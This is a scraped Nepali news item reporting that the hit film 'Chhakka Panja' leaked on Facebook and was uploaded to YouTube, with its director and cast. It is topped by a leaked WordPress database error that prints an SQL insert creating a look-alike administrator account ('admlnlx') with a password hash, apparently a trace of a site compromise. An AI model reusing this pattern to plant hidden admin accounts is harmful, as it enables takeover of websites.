WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.wbhvMUw/mim0OhQrvEAWFfLkl9QG/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-16 14:57:11', '', 'admlnlx', 'admlnlx')
चितवन,पुस २९-
नेपाली कथानक चलचित्र ‘छक्का पञ्जा’ युट्युबमार्फत सार्वजनिक गरिएको छ । लिक भएपछि ‘छक्का पञ्जा’ युट्युबमा राखिएको हो ।
‘छक्का पञ्जा’ फेसबुक मार्फत लिक भएको थियो । वर्षकै सर्वाधिक सफल चलचित्र ‘छक्का पञ्जा’ नेपालमा सबैभन्दा धेरै व्यापार गर्ने चलचित्र हो ।
यसले १०१ औं दिन समेत मनाउन सफल भएको थियो । दीपाश्री निरौलाले निर्देशन गरेको ‘छक्का पञ्जा’मा दीपकराज गिरी, शिवहरी, पौडेल, जितु नेपाल, केदार घिमिरे, बुद्धि तामाङ्ग, प्रियंका कार्की, वर्षा राउत मुख्य भूमिकामा छन् ।